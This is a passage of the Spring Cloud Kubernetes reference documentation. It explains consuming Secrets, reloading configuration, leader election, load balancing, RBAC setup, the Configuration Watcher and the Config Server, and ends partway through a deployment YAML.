We can create a Kubernetes secret by using the following command:\n\n====\n[source]\n----\nkubectl create secret generic db-secret --from-literal=username=user --from-literal=password=p455w0rd\n----\n====\n\nThe preceding command would create the following secret (which you can see by using `kubectl get secrets db-secret -o yaml`):\n\n====\n[source,yaml]\n----\napiVersion: v1\ndata:\n password: cDQ1NXcwcmQ=\n username: dXNlcg==\nkind: Secret\nmetadata:\n creationTimestamp: 2017-07-04T09:15:57Z\n name: db-secret\n namespace: default\n resourceVersion: \"357496\"\n selfLink: \/api\/v1\/namespaces\/default\/secrets\/db-secret\n uid: 63c89263-6099-11e7-b3da-76d6186905a8\ntype: Opaque\n----\n====\n\nNote that the data contains Base64-encoded versions of the literals provided by the `create` command.\n\nYour application can then use this secret, for example, by exporting the secret's values as environment variables:\n\n====\n[source,yaml]\n----\napiVersion: apps\/v1\nkind: Deployment\nmetadata:\n name: ${project.artifactId}\nspec:\n template:\n spec:\n containers:\n - env:\n - name: DB_USERNAME\n valueFrom:\n secretKeyRef:\n name: db-secret\n key: username\n - name: DB_PASSWORD\n valueFrom:\n secretKeyRef:\n name: db-secret\n key: password\n----\n====\n\nYou can select the Secrets to consume in a number of ways:\n\n. By listing the directories where secrets are mapped:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.paths=\/etc\/secrets\/db-secret,\/etc\/secrets\/postgresql\n----\n====\n+\nIf you have all the secrets mapped to a common root, you can set them like this:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.paths=\/etc\/secrets\n----\n====\n\n. By setting a named secret:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.name=db-secret\n----\n====\n\n. By defining a list of labels:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.labels.broker=activemq\n-Dspring.cloud.kubernetes.secrets.labels.db=postgresql\n----\n====
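\n\nOnce a secret is selected through any of these options, its keys become available as ordinary properties. The following is a minimal sketch, assuming the `db-secret` shown above has been selected (for example, by setting `spring.cloud.kubernetes.secrets.name=db-secret`); the class name is an illustrative assumption:\n\n====\n[source,java]\n----\n@Component\npublic class DbCredentials {\n\n    \/\/ populated from the 'username' key of db-secret\n    @Value(\"${username}\")\n    private String username;\n\n    \/\/ populated from the 'password' key of db-secret\n    @Value(\"${password}\")\n    private String password;\n}\n----\n====\n\n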
As with `ConfigMap`, more advanced configuration is also possible, where you can use multiple `Secret`\ninstances. The `spring.cloud.kubernetes.secrets.sources` list makes this possible.\nFor example, you could define the following `Secret` instances:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: cloud-k8s-app\n cloud:\n kubernetes:\n secrets:\n name: default-name\n namespace: default-namespace\n sources:\n # Spring Cloud Kubernetes looks up a Secret named s1 in namespace default-namespace\n - name: s1\n # Spring Cloud Kubernetes looks up a Secret named default-name in namespace n2\n - namespace: n2\n # Spring Cloud Kubernetes looks up a Secret named s3 in namespace n3\n - namespace: n3\n name: s3\n----\n====\n\nIn the preceding example, if `spring.cloud.kubernetes.secrets.namespace` had not been set,\nthe `Secret` named `s1` would be looked up in the namespace that the application runs in.\nSee <<namespace-resolution,Namespace resolution>> to get a better understanding of how the namespace\nof the application is resolved.\n\n<<config-map-fail-fast,Similar to the `ConfigMaps`>>, if you want your application to fail to start\nwhen it is unable to load `Secrets` property sources, you can set `spring.cloud.kubernetes.secrets.fail-fast=true`.\n\nIt is also possible to enable retry for `Secret` property sources, <<config-map-retry,as for the `ConfigMaps`>>.\nAs with the `ConfigMap` property sources, first you need to set `spring.cloud.kubernetes.secrets.fail-fast=true`.\nThen you need to add `spring-retry` and `spring-boot-starter-aop` to your classpath.\nRetry behavior of the `Secret` property sources can be configured by setting the `spring.cloud.kubernetes.secrets.retry.*`\nproperties.\n\nNOTE: If you already have `spring-retry` and `spring-boot-starter-aop` on the classpath for some reason\nand want to enable fail-fast, but do not want retry to be enabled, you can disable retry for `Secrets` `PropertySources`\nby setting `spring.cloud.kubernetes.secrets.retry.enabled=false`.\n\n.Properties:\n[options=\"header,footer\"]\n|===\n| Name | Type | Default | Description\n| `spring.cloud.kubernetes.secrets.enabled` | `Boolean` | `true` | Enable Secrets `PropertySource`\n| `spring.cloud.kubernetes.secrets.name` | `String` | `${spring.application.name}` | Sets the name of the secret to look up\n| `spring.cloud.kubernetes.secrets.namespace` | `String` | Client namespace | Sets the Kubernetes namespace to look up in\n| `spring.cloud.kubernetes.secrets.labels` | `Map` | `null` | Sets the labels used to look up secrets\n| `spring.cloud.kubernetes.secrets.paths` | `List` | `null` | Sets the paths where secrets are mounted (example 1)\n| `spring.cloud.kubernetes.secrets.enableApi` | `Boolean` | `false` | Enables or disables consuming secrets through APIs (examples 2 and 3)\n| `spring.cloud.kubernetes.secrets.fail-fast` | `Boolean` | `false` | Enable or disable failing the application start-up when an error occurs while loading a `Secret`\n| `spring.cloud.kubernetes.secrets.retry.enabled` | `Boolean` | `true` | Enable or disable secrets retry.\n| `spring.cloud.kubernetes.secrets.retry.initial-interval` | `Long` | `1000` | Initial retry interval in milliseconds.\n| `spring.cloud.kubernetes.secrets.retry.max-attempts` | `Integer` | `6` | Maximum number of attempts.\n| `spring.cloud.kubernetes.secrets.retry.max-interval` | `Long` | `2000` | Maximum interval for backoff.\n| `spring.cloud.kubernetes.secrets.retry.multiplier` | `Double` | `1.1` | Multiplier for next interval.\n|===\n\nNotes:\n\n* The `spring.cloud.kubernetes.secrets.labels` property behaves as defined by\n
https:\/\/github.com\/spring-projects\/spring-boot\/wiki\/Spring-Boot-Configuration-Binding#map-based-binding[Map-based binding].\n* The `spring.cloud.kubernetes.secrets.paths` property behaves as defined by\nhttps:\/\/github.com\/spring-projects\/spring-boot\/wiki\/Spring-Boot-Configuration-Binding#collection-based-binding[Collection-based binding].\n* Access to secrets through the API may be restricted for security reasons. The preferred way is to mount secrets to the Pod.\n\nYou can find an example of an application that uses secrets (though it has not been updated to use the new `spring-cloud-kubernetes` project) at\nhttps:\/\/github.com\/fabric8-quickstarts\/spring-boot-camel-config[spring-boot-camel-config].\n\n[[namespace-resolution]]\n=== Namespace resolution\nFinding an application namespace happens on a best-effort basis. There are some steps that we iterate through in order\nto find it. The easiest and most common one is to specify it in the proper configuration, for example:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: app\n cloud:\n kubernetes:\n secrets:\n name: secret\n namespace: default\n sources:\n # Spring Cloud Kubernetes looks up a Secret named 'a' in namespace 'default'\n - name: a\n # Spring Cloud Kubernetes looks up a Secret named 'secret' in namespace 'b'\n - namespace: b\n # Spring Cloud Kubernetes looks up a Secret named 'd' in namespace 'c'\n - namespace: c\n name: d\n----\n====\n\nRemember that the same can be done for config maps. If such a namespace is not specified, it will be read (in this order):\n\n1. from the property `spring.cloud.kubernetes.client.namespace`\n2. from a String residing in a file denoted by the `spring.cloud.kubernetes.client.serviceAccountNamespacePath` property\n3. from a String residing in the `\/var\/run\/secrets\/kubernetes.io\/serviceaccount\/namespace` file\n(the default Kubernetes namespace path)\n4. from a designated client method call (for example, Fabric8's `KubernetesClient::getNamespace`), if the client provides\nsuch a method. This, in turn, could be configured via environment properties. For example, the Fabric8 client can be configured via\nthe `KUBERNETES_NAMESPACE` property; consult the client documentation for exact details.\n\nFailure to find a namespace from the above steps will result in an Exception being raised.\n\n=== `PropertySource` Reload\n\nWARNING: This functionality has been deprecated in the 2020.0 release. Please see\nthe <<spring-cloud-kubernetes-configuration-watcher>> controller for an alternative way\nto achieve the same functionality.\n\nSome applications may need to detect changes on external property sources and update their internal status to reflect the new configuration.\nThe reload feature of Spring Cloud Kubernetes is able to trigger an application reload when a related `ConfigMap` or\n`Secret` changes.\n\nBy default, this feature is disabled. You can enable it by using the `spring.cloud.kubernetes.reload.enabled=true` configuration property (for example, in the `application.properties` file).\n\nThe following levels of reload are supported (by setting the `spring.cloud.kubernetes.reload.strategy` property):\n\n* `refresh` (default): Only configuration beans annotated with `@ConfigurationProperties` or `@RefreshScope` are reloaded.\nThis reload level leverages the refresh feature of Spring Cloud Context.\n\n* `restart_context`: the whole Spring `ApplicationContext` is gracefully restarted. 
Beans are recreated with the new configuration.\nIn order for the restart context functionality to work properly, you must enable and expose the restart actuator endpoint:\n+\n====\n[source,yaml]\n----\nmanagement:\n endpoint:\n restart:\n enabled: true\n endpoints:\n web:\n exposure:\n include: restart\n----\n====\n\n* `shutdown`: the Spring `ApplicationContext` is shut down to activate a restart of the container.\nWhen you use this level, make sure that the lifecycle of all non-daemon threads is bound to the `ApplicationContext`\nand that a replication controller or replica set is configured to restart the pod.\n\nAssuming that the reload feature is enabled with default settings (`refresh` mode), the following bean is refreshed when the config map changes:\n\n====\n[source,java]\n----\n@Configuration\n@ConfigurationProperties(prefix = \"bean\")\npublic class MyConfig {\n\n private String message = \"a message that can be changed live\";\n\n \/\/ getters and setters\n\n}\n----\n====\n\nTo see that changes effectively happen, you can create another bean that prints the message periodically, as follows:\n\n====\n[source,java]\n----\n@Component\npublic class MyBean {\n\n @Autowired\n private MyConfig config;\n\n @Scheduled(fixedDelay = 5000)\n public void hello() {\n System.out.println(\"The message is: \" + config.getMessage());\n }\n}\n----\n====\n\nYou can change the message printed by the application by using a `ConfigMap`, as follows:\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: ConfigMap\nmetadata:\n name: reload-example\ndata:\n application.properties: |-\n bean.message=Hello World!\n----\n====\n\nAny change to the property named `bean.message` in the `ConfigMap` associated with the pod is reflected in the\noutput. More generally speaking, changes associated with properties prefixed with the value defined by the `prefix`\nfield of the `@ConfigurationProperties` annotation are detected and reflected in the application.\n<<configmap-propertysource,Associating a `ConfigMap` with a pod>> is explained earlier in this chapter.\n\nThe full example is available in https:\/\/github.com\/spring-cloud\/spring-cloud-kubernetes\/tree\/main\/spring-cloud-kubernetes-examples\/kubernetes-reload-example[`spring-cloud-kubernetes-reload-example`].\n\nThe reload feature supports two operating modes:\n\n* Event (default): Watches for changes in config maps or secrets by using the Kubernetes API (web socket).\nAny event produces a re-check on the configuration and, in case of changes, a reload.\nThe `view` role on the service account is required in order to listen for config map changes. 
A higher level role (such as `edit`) is required for secrets\n(by default, secrets are not monitored).\n* Polling: Periodically re-creates the configuration from config maps and secrets to see if it has changed.\nYou can configure the polling period by using the `spring.cloud.kubernetes.reload.period` property; it defaults to 15 seconds.\nIt requires the same role as the monitored property source.\nThis means, for example, that using polling on file-mounted secret sources does not require particular privileges.\n\n.Properties:\n[options=\"header,footer\"]\n|===\n| Name | Type | Default | Description\n| `spring.cloud.kubernetes.reload.enabled` | `Boolean` | `false` | Enables monitoring of property sources and configuration reload\n| `spring.cloud.kubernetes.reload.monitoring-config-maps` | `Boolean` | `true` | Allow monitoring changes in config maps\n| `spring.cloud.kubernetes.reload.monitoring-secrets` | `Boolean` | `false` | Allow monitoring changes in secrets\n| `spring.cloud.kubernetes.reload.strategy` | `Enum` | `refresh` | The strategy to use when firing a reload (`refresh`, `restart_context`, or `shutdown`)\n| `spring.cloud.kubernetes.reload.mode` | `Enum` | `event` | Specifies how to listen for changes in property sources (`event` or `polling`)\n| `spring.cloud.kubernetes.reload.period` | `Duration`| `15s` | The period for verifying changes when using the `polling` strategy\n|===\n\nNotes:\n\n* You should not use properties under `spring.cloud.kubernetes.reload` in config maps or secrets. Changing such properties at runtime may lead to unexpected results.\n* Deleting a property or the whole config map does not restore the original state of the beans when you use the `refresh` level.\n\n== Kubernetes Ecosystem Awareness\n\nAll features described earlier in this guide work equally well, regardless of whether your application is running inside\nKubernetes. This is really helpful for development and troubleshooting.\nFrom a development point of view, this lets you start your Spring Boot application and debug one\nof the modules that is part of this project. You need not deploy it in Kubernetes,\nas the code of the project relies on the\nhttps:\/\/github.com\/fabric8io\/kubernetes-client[Fabric8 Kubernetes Java client], which is a fluent DSL that can\ncommunicate over the `http` protocol with the REST API of the Kubernetes server.\n\nKubernetes awareness is based on the Spring Boot API, specifically on https:\/\/docs.spring.io\/spring-boot\/docs\/current\/api\/org\/springframework\/boot\/autoconfigure\/condition\/ConditionalOnCloudPlatform.html[ConditionalOnCloudPlatform].\nThat mechanism auto-detects whether your application is currently deployed on Kubernetes. It is possible to override\nthat setting via `spring.main.cloud-platform`.\n\nFor example, if you need to test some features, but do not want to deploy to a cluster, it is enough to set\n`spring.main.cloud-platform=KUBERNETES`. This makes `spring-cloud-kubernetes` act as if it were deployed in a real cluster.
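\n\nFor example, a minimal `bootstrap.properties` for such a local test might contain nothing more than:\n\n====\n[source,properties]\n----\nspring.main.cloud-platform=KUBERNETES\n----\n====\n\n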
Be aware that when `spring-cloud-kubernetes-config` is on the classpath, `spring.main.cloud-platform` should be set in `bootstrap.{properties|yml}`\n(or the profile-specific one); otherwise, it should be in `application.{properties|yml}` (or the profile-specific one).\nAlso note that the properties `spring.cloud.kubernetes.config.enabled` and `spring.cloud.kubernetes.secrets.enabled`\nonly take effect when set in `bootstrap.{properties|yml}`.\n\n=== Breaking Changes In 3.0.x\n\nIn versions of Spring Cloud Kubernetes prior to `3.0.x`, Kubernetes awareness was implemented using the `spring.cloud.kubernetes.enabled` property. This\nproperty was removed and is unsupported. Instead, we use the Spring Boot API: https:\/\/docs.spring.io\/spring-boot\/docs\/current\/api\/org\/springframework\/boot\/autoconfigure\/condition\/ConditionalOnCloudPlatform.html[ConditionalOnCloudPlatform].\nIf you need to explicitly enable or disable this awareness, use `spring.main.cloud-platform=NONE\/KUBERNETES`.\n\n=== Kubernetes Profile Autoconfiguration\n\nWhen the application runs as a pod inside Kubernetes, a Spring profile named `kubernetes` automatically gets activated.\nThis lets you customize the configuration to define beans that are applied when the Spring Boot application is deployed\nwithin the Kubernetes platform (for example, different development and production configurations).\n\n=== Istio Awareness\n\nWhen you include the `spring-cloud-kubernetes-fabric8-istio` module in the application classpath, a new profile is added to the application,\nprovided the application is running inside a Kubernetes Cluster with https:\/\/istio.io[Istio] installed. You can then use\nSpring `@Profile(\"istio\")` annotations in your Beans and `@Configuration` classes.\n\nThe Istio awareness module uses `me.snowdrop:istio-client` to interact with Istio APIs, letting us discover traffic rules, circuit breakers, and so on,\nmaking it easy for our Spring Boot applications to consume this data to dynamically configure themselves according to the environment.\n\n== Pod Health Indicator\n\nSpring Boot uses https:\/\/github.com\/spring-projects\/spring-boot\/blob\/master\/spring-boot-project\/spring-boot-actuator\/src\/main\/java\/org\/springframework\/boot\/actuate\/health\/HealthEndpoint.java[`HealthIndicator`] to expose info about the health of an application.\nThat makes it really useful for exposing health-related information to the user and makes it a good fit for use as https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-liveness-readiness-probes\/[readiness probes].\n\nThe Kubernetes health indicator (which is part of the core module) exposes the following info:\n\n* Pod name, IP address, namespace, service account, node name, and node IP address\n* A flag that indicates whether the Spring Boot application is internal or external to Kubernetes\n\nYou can disable this `HealthContributor` by setting `management.health.kubernetes.enabled`\nto `false` in `application.[properties | yaml]`.\n\n== Info Contributor\n\nSpring Cloud Kubernetes includes an `InfoContributor` which adds Pod information to\nSpring Boot's `\/info` Actuator endpoint.\n\nYou can disable this `InfoContributor` by setting `management.info.kubernetes.enabled`\nto `false` in `application.[properties | yaml]`.\n\n== Leader Election\nThe Spring Cloud Kubernetes leader election mechanism implements the leader election API of Spring Integration using a Kubernetes ConfigMap.\n\nMultiple application instances compete for leadership, but leadership will be granted to only one.\nWhen granted leadership, a leader application receives an `OnGrantedEvent` application event with leadership `Context`.\nApplications periodically attempt to gain leadership, with leadership granted to the first caller.\nA leader will remain a leader until either it is removed from the cluster or it yields its leadership.\nWhen leadership removal occurs, the previous leader receives an `OnRevokedEvent` application event.\nAfter removal, any instances in the cluster may become the new leader, including the old leader.
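\n\nA minimal sketch of a component reacting to these events might look as follows (the class name is an illustrative assumption):\n\n====\n[source,java]\n----\n@Component\npublic class LeadershipEvents {\n\n    \/\/ invoked when this instance is granted leadership\n    @EventListener\n    public void granted(OnGrantedEvent event) {\n        System.out.println(\"Leadership granted for role: \" + event.getRole());\n    }\n\n    \/\/ invoked when this instance loses leadership\n    @EventListener\n    public void revoked(OnRevokedEvent event) {\n        System.out.println(\"Leadership revoked for role: \" + event.getRole());\n    }\n}\n----\n====\n\n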
To include it in your project, add the following dependency.\n====\nFabric8 Leader Implementation\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-kubernetes-fabric8-leader<\/artifactId>\n<\/dependency>\n----\n====\n\nTo specify the name of the configmap used for leader election, use the following property.\n====\n[source,properties]\n----\nspring.cloud.kubernetes.leader.config-map-name=leader\n----\n====\n\n== LoadBalancer for Kubernetes\nThis project includes Spring Cloud Load Balancer for load balancing based on Kubernetes Endpoints and provides an implementation of a load balancer based on a Kubernetes Service.\nTo include it in your project, add one of the following dependencies.\n====\nFabric8 Implementation\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-fabric8-loadbalancer<\/artifactId>\n<\/dependency>\n----\n====\n\n====\nKubernetes Java Client Implementation\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-client-loadbalancer<\/artifactId>\n<\/dependency>\n----\n====\n\nTo enable load balancing based on the Kubernetes Service name, use the following property. The load balancer will then try to call the application by using an address such as `service-a.default.svc.cluster.local`.\n====\n[source]\n----\nspring.cloud.kubernetes.loadbalancer.mode=SERVICE\n----\n====\n\nTo enable load balancing across all namespaces, use the following property. The property from the `spring-cloud-kubernetes-discovery` module is respected.\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.all-namespaces=true\n----\n====\n\nIf a service needs to be accessed over HTTPS, you need to add a label or annotation with the name `secured` and the value `true` to your service definition, and the load balancer will then use HTTPS to make requests to the service.\n\n== Security Configurations Inside Kubernetes\n\n\n=== Namespace\n\nMost of the components provided in this project need to know the namespace. For Kubernetes (1.3+), the namespace is made available to the pod as part of the service account secret and is automatically detected by the client.\nFor earlier versions, it needs to be specified as an environment variable to the pod. 
A quick way to do this is as follows:\n\n====\n[source]\n----\n env:\n - name: \"KUBERNETES_NAMESPACE\"\n valueFrom:\n fieldRef:\n fieldPath: \"metadata.namespace\"\n----\n====\n\n=== Service Account\n\nFor distributions of Kubernetes that support more fine-grained role-based access within the cluster, you need to make sure a pod that runs with `spring-cloud-kubernetes` has access to the Kubernetes API.\nFor any service accounts you assign to a deployment or pod, you need to make sure they have the correct roles.\n\nDepending on the requirements, you'll need `get`, `list`, and `watch` permission on the following resources:\n\n.Kubernetes Resource Permissions\n|===\n|Dependency | Resources\n\n\n|spring-cloud-starter-kubernetes-fabric8\n|pods, services, endpoints\n\n|spring-cloud-starter-kubernetes-fabric8-config\n|configmaps, secrets\n\n|spring-cloud-starter-kubernetes-client\n|pods, services, endpoints\n\n|spring-cloud-starter-kubernetes-client-config\n|configmaps, secrets\n|===\n\nFor development purposes, you can add `cluster-reader` permissions to your `default` service account. On a production system, you'll likely want to provide more granular permissions.\n\nThe following Role and RoleBinding are an example of namespaced permissions for the `default` account:\n\n====\n[source,yaml]\n----\nkind: Role\napiVersion: rbac.authorization.k8s.io\/v1\nmetadata:\n namespace: YOUR-NAME-SPACE\n name: namespace-reader\nrules:\n - apiGroups: [\"\"]\n resources: [\"configmaps\", \"pods\", \"services\", \"endpoints\", \"secrets\"]\n verbs: [\"get\", \"list\", \"watch\"]\n\n---\n\nkind: RoleBinding\napiVersion: rbac.authorization.k8s.io\/v1\nmetadata:\n name: namespace-reader-binding\n namespace: YOUR-NAME-SPACE\nsubjects:\n- kind: ServiceAccount\n name: default\n apiGroup: \"\"\nroleRef:\n kind: Role\n name: namespace-reader\n apiGroup: \"\"\n----\n====\n\n== Service Registry Implementation\n\nIn Kubernetes, service registration is controlled by the platform; the application itself does not control\nregistration as it may in other platforms. For this reason, using `spring.cloud.service-registry.auto-registration.enabled`\nor setting `@EnableDiscoveryClient(autoRegister=false)` will have no effect in Spring Cloud Kubernetes.\n\n[#spring-cloud-kubernetes-configuration-watcher]\n## Spring Cloud Kubernetes Configuration Watcher\n\nKubernetes provides the ability to https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-pod-configmap\/#add-configmap-data-to-a-volume[mount a ConfigMap or Secret as a volume]\nin the container of your application. When the contents of the ConfigMap or Secret changes, the https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-pod-configmap\/#mounted-configmaps-are-updated-automatically[mounted volume will be updated with those changes].\n\nHowever, Spring Boot will not automatically update those changes unless you restart the application. 
Spring Cloud\nprovides the ability to refresh the application context without restarting the application by either hitting the\nactuator endpoint `\/refresh` or by publishing a `RefreshRemoteApplicationEvent` using Spring Cloud Bus.\n\nTo achieve this configuration refresh of a Spring Cloud app running on Kubernetes, you can deploy the Spring Cloud\nKubernetes Configuration Watcher controller into your Kubernetes cluster.\n\nThe application is published as a container and is available on https:\/\/hub.docker.com\/r\/springcloud\/spring-cloud-kubernetes-configuration-watcher[Docker Hub].\n\nSpring Cloud Kubernetes Configuration Watcher can send refresh notifications to applications in two ways.\n\n1. Over HTTP, in which case the application being notified must have the `\/refresh` actuator endpoint exposed and accessible from within the cluster\n2. Using Spring Cloud Bus, in which case you will need a message broker deployed to your cluster for the application to use.\n\n### Deployment YAML\n\nBelow is a sample deployment YAML you can use to deploy the Kubernetes Configuration Watcher to Kubernetes.\n\n====\n[source,yaml]\n----\n---\napiVersion: v1\nkind: List\nitems:\n - apiVersion: v1\n kind: Service\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n name: spring-cloud-kubernetes-configuration-watcher\n spec:\n ports:\n - name: http\n port: 8888\n targetPort: 8888\n selector:\n app: spring-cloud-kubernetes-configuration-watcher\n type: ClusterIP\n - apiVersion: v1\n kind: ServiceAccount\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n name: spring-cloud-kubernetes-configuration-watcher\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: RoleBinding\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n name: spring-cloud-kubernetes-configuration-watcher:view\n roleRef:\n kind: Role\n apiGroup: rbac.authorization.k8s.io\n name: namespace-reader\n subjects:\n - kind: ServiceAccount\n name: spring-cloud-kubernetes-configuration-watcher\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: Role\n metadata:\n namespace: default\n name: namespace-reader\n rules:\n - apiGroups: [\"\", \"extensions\", \"apps\"]\n resources: [\"configmaps\", \"pods\", \"services\", \"endpoints\", \"secrets\"]\n verbs: [\"get\", \"list\", \"watch\"]\n - apiVersion: apps\/v1\n kind: Deployment\n metadata:\n name: spring-cloud-kubernetes-configuration-watcher-deployment\n spec:\n selector:\n matchLabels:\n app: spring-cloud-kubernetes-configuration-watcher\n template:\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n spec:\n serviceAccount: spring-cloud-kubernetes-configuration-watcher\n containers:\n - name: spring-cloud-kubernetes-configuration-watcher\n image: springcloud\/spring-cloud-kubernetes-configuration-watcher:2.0.1-SNAPSHOT\n imagePullPolicy: IfNotPresent\n readinessProbe:\n httpGet:\n port: 8888\n path: \/actuator\/health\/readiness\n livenessProbe:\n httpGet:\n port: 8888\n path: \/actuator\/health\/liveness\n ports:\n - containerPort: 8888\n\n----\n====\n\nThe Service Account and associated Role Binding are important for Spring Cloud Kubernetes Configuration Watcher to work properly.\nThe controller needs access to read data about ConfigMaps, Pods, Services, Endpoints and Secrets in the Kubernetes cluster.\n\n### Monitoring ConfigMaps and Secrets\n\nSpring Cloud Kubernetes Configuration Watcher will react to changes in ConfigMaps with a label of `spring.cloud.kubernetes.config` with the value `true`\nor any Secret 
with a label of `spring.cloud.kubernetes.secret` with the value `true`. If the ConfigMap or Secret does not have either of those labels,\nor the values of those labels are not `true`, then any changes will be ignored.\n\nThe labels Spring Cloud Kubernetes Configuration Watcher looks for on ConfigMaps and Secrets can be changed by setting\n`spring.cloud.kubernetes.configuration.watcher.configLabel` and `spring.cloud.kubernetes.configuration.watcher.secretLabel`, respectively.\n\nIf a change is made to a ConfigMap or Secret with valid labels, then Spring Cloud Kubernetes Configuration Watcher will take the name of the ConfigMap or Secret\nand send a notification to the application with that name.\n\n### HTTP Implementation\n\nThe HTTP implementation is what is used by default. When this implementation is used and a change to a ConfigMap or Secret occurs,\nSpring Cloud Kubernetes Configuration Watcher will use the Spring Cloud Kubernetes Discovery Client to fetch all\ninstances of the application that match the name of the ConfigMap or Secret and send an HTTP POST request to the application's actuator\n`\/refresh` endpoint. By default, it will send the POST request to `\/actuator\/refresh` using the port registered in the discovery client.\n\n#### Non-Default Management Port and Actuator Path\n\nIf the application is using a non-default actuator path and\/or using a different port for the management endpoints, the Kubernetes service for the application\ncan add an annotation called `boot.spring.io\/actuator` and set its value to the path and port used by the application. For example:\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: Service\nmetadata:\n labels:\n app: config-map-demo\n name: config-map-demo\n annotations:\n boot.spring.io\/actuator: http:\/\/:9090\/myactuator\/home\nspec:\n ports:\n - name: http\n port: 8080\n targetPort: 8080\n selector:\n app: config-map-demo\n----\n====\n\n\nAnother way you can choose to configure the actuator path and\/or management port is by setting\n`spring.cloud.kubernetes.configuration.watcher.actuatorPath` and `spring.cloud.kubernetes.configuration.watcher.actuatorPort`.\n\n### Messaging Implementation\n\nThe messaging implementation can be enabled by setting the profile to either `bus-amqp` (RabbitMQ) or `bus-kafka` (Kafka) when the Spring Cloud Kubernetes Configuration Watcher\napplication is deployed to Kubernetes.\n\n### Configuring RabbitMQ\n\nWhen the `bus-amqp` profile is enabled, you will need to configure Spring RabbitMQ to point it to the location of the RabbitMQ\ninstance you would like to use, as well as any credentials necessary to authenticate. This can be done\nby setting the standard Spring RabbitMQ properties, for example:\n\n====\n[source,yaml]\n----\nspring:\n rabbitmq:\n username: user\n password: password\n host: rabbitmq\n----\n====\n\n### Configuring Kafka\n\nWhen the `bus-kafka` profile is enabled, you will need to configure Spring Kafka to point it to the location of the Kafka Broker\ninstance you would like to use. 
This can be done by setting the standard Spring Kafka properties, for example:\n\n====\n[source,yaml]\n----\nspring:\n kafka:\n producer:\n bootstrap-servers: localhost:9092\n----\n====\n\n[#spring-cloud-kubernetes-configserver]\n## Spring Cloud Kubernetes Config Server\n\nThe Spring Cloud Kubernetes Config Server is based on https:\/\/spring.io\/projects\/spring-cloud-config[Spring Cloud Config Server] and adds an https:\/\/docs.spring.io\/spring-cloud-config\/docs\/current\/reference\/html\/#_environment_repository[environment repository] for Kubernetes\nhttps:\/\/kubernetes.io\/docs\/concepts\/configuration\/configmap\/[Config Maps] and https:\/\/kubernetes.io\/docs\/concepts\/configuration\/secret\/[Secrets].\n\nThis component is completely optional. However, it allows you to continue to leverage configuration\nyou may have stored in existing environment repositories (Git, SVN, Vault, etc.) with applications that you are running on Kubernetes.\n\nA default image is located on https:\/\/hub.docker.com\/r\/springcloud\/spring-cloud-kubernetes-configserver[Docker Hub], which will allow you to easily get a Config Server deployed on Kubernetes without building\nthe code and image yourself. However, if you need to customize the config server behavior, you can easily build your own\nimage from the source code on GitHub and use that.\n\n### Configuration\n\n#### Enabling The Kubernetes Environment Repository\nTo enable the Kubernetes environment repository, the `kubernetes` profile must be included in the list of active profiles.\nYou may activate other profiles as well to use other environment repository implementations.\n\n#### Config Map and Secret PropertySources\nBy default, only Config Map data will be fetched. To enable Secrets as well, you will need to set `spring.cloud.kubernetes.secrets.enableApi=true`.\nYou can disable the Config Map `PropertySource` by setting `spring.cloud.kubernetes.config.enableApi=false`.\n\n#### Fetching Config Map and Secret Data From Additional Namespaces\nBy default, the Kubernetes environment repository will only fetch Config Maps and Secrets from the namespace in which it is deployed.\nIf you want to include data from other namespaces, you can set `spring.cloud.kubernetes.configserver.config-map-namespaces` and\/or `spring.cloud.kubernetes.configserver.secrets-namespaces` to a comma-separated\nlist of namespace values.\n\nNOTE: If you set `spring.cloud.kubernetes.configserver.config-map-namespaces` and\/or `spring.cloud.kubernetes.configserver.secrets-namespaces`,\nyou will need to include the namespace in which the Config Server is deployed in order to continue to fetch Config Map and Secret data from that namespace.\n\n#### Kubernetes Access Controls\nThe Kubernetes Config Server uses the Kubernetes API server to fetch Config Map and Secret data. 
In order for it to do that,\nit needs the ability to `get` and `list` Config Maps and Secrets (depending on what you enable or disable).\n\n### Deployment Yaml\n\nBelow is a sample deployment, service, and permissions configuration you can use to deploy a basic Config Server to Kubernetes.\n\n====\n[source,yaml]\n----\n---\napiVersion: v1\nkind: List\nitems:\n - apiVersion: v1\n kind: Service\n metadata:\n labels:\n app: spring-cloud-kubernetes-configserver\n name: spring-cloud-kubernetes-configserver\n spec:\n ports:\n - name: http\n port: 8888\n targetPort: 8888\n selector:\n app: spring-cloud-kubernetes-configserver\n type: ClusterIP\n - apiVersion: v1\n kind: ServiceAccount\n metadata:\n labels:\n app: spring-cloud-kubernetes-configserver\n name: spring-cloud-kubernetes-configserver\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: RoleBinding\n metadata:\n labels:\n app: spring-cloud-kubernetes-configserver\n name: spring-cloud-kubernetes-configserver:view\n roleRef:\n kind: Role\n apiGroup: rbac.authorization.k8s.io\n name: namespace-reader\n subjects:\n - kind: ServiceAccount\n name: spring-cloud-kubernetes-configserver\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: Role\n metadata:\n namespace: default\n name: namespace-reader\n rules:\n - apiGroups: [\"\", \"extensions\", \"apps\"]\n resources: [\"configmaps\", \"secrets\"]\n verbs: [\"get\", \"list\"]\n - apiVersion: apps\/v1\n kind: Deployment\n metadata:\n name: spring-cloud-kubernetes-configserver-deployment\n spec:\n selector:\n matchLabels:\n app: 